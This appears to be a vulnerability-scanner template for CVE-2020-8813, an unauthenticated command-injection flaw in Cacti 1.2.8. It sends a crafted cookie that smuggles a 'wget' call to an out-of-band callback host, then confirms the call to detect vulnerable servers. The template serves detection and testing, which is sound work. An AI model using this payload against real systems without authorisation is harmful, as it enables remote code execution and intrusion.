id: CVE-2020-8813

info:
  name: Cacti v1.2.8 - Unauthenticated Remote Code Execution
  author: gy741
  severity: high
  description: This vulnerability could be exploited without authentication if Cacti is enabling "Guest Realtime Graphs" privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability.
  reference:
    - https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/
    - https://github.com/Cacti/cacti/releases
    - https://gist.github.com/mhaskar/ebe6b74c32fd0f7e1eedf1aabfd44129
    - https://drive.google.com/file/d/1A8hxTyk_NgSp04zPX-23nPbsSDeyDFio/view
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2020-8813
    cwe-id: CWE-78
  tags: cve,cve2020,cacti,rce,oast

requests:
  - raw:
      - |
        GET /graph_realtime.php?action=init HTTP/1.1
        Host: {{Hostname}}
        Cookie: Cacti=%3Bwget%20http%3A//{{interactsh-url}}

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"